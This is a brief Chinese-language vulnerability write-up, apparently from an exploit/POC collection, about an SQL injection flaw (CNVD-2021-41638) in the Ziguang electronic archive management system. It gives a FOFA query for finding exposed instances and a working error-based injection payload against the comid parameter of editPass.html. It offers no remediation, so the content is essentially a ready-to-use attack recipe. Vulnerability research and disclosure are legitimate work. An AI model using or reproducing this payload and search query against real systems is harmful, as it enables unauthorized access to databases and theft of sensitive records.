# 紫光档案管理系统 editPass.html SQL注入漏洞 CNVD-2021-41638

## 漏洞描述

紫光软件系统有限公司（以下简称“紫光软件”）是中国领先的行业解决方案和IT服务提供商。 紫光电子档案管理系统存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。

## 漏洞影响

```
紫光电子档案管理系统
```

## FOFA

```
app="紫光档案管理系统"
```

## 漏洞复现

登录页面

![image-20220525145742607](./images/202205251457947.png)

验证POC

```
/login/Login/editPass.html?comid=extractvalue(1,concat(char(126),md5(1)))
```

![](./images/202205251458637.png)